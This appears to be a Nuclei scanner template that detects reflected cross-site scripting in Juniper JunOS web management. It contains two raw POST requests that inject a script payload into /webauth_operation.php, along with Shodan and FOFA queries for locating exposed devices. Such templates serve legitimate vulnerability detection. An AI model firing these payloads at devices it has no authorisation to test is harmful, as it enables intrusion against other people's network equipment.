nuclei-templates/http/vulnerabilities/juniper/junos-xss.yaml

51 lines
1.3 KiB
YAML
Raw Normal View History

2024-01-18 21:18:03 +00:00
id: junos-xss
info:
name: JunOS - Cross-Site Scripting
author: DhiyaneshDK
severity: medium
reference:
- https://labs.watchtowr.com/the-second-wednesday-of-the-first-month-of-every-quarter-juniper-0day-revisited/
metadata:
verified: true
max-request: 2
shodan-query: title:"Juniper Web Device Manager"
fofa-query: title="Juniper Web Device Manager"
tags: junos,xss
variables:
string: "{{to_lower(rand_base(2))}}"
http:
- raw:
- |
POST /webauth_operation.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2024-01-18 21:21:51 +00:00
2024-01-18 21:18:03 +00:00
rs=emit_debug_note&rsargs[]={{string}}&rsargs[]=<script>alert('document.domain');</script>
- |
POST /webauth_operation.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2024-01-18 21:21:51 +00:00
2024-01-18 21:18:03 +00:00
rs=sajax_show_one_stub&rsargs[]={{string}}<script>alert('document.domain');</script>
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
name: emit-debug-note-xss
words:
- "ERROR: <script>alert('document.domain');</script>"
- "monospace"
condition: and
- type: word
name: sajax-show-one-stub-xss
words:
- "<script>alert('document.domain');</script>"
- "wrapper for"
condition: and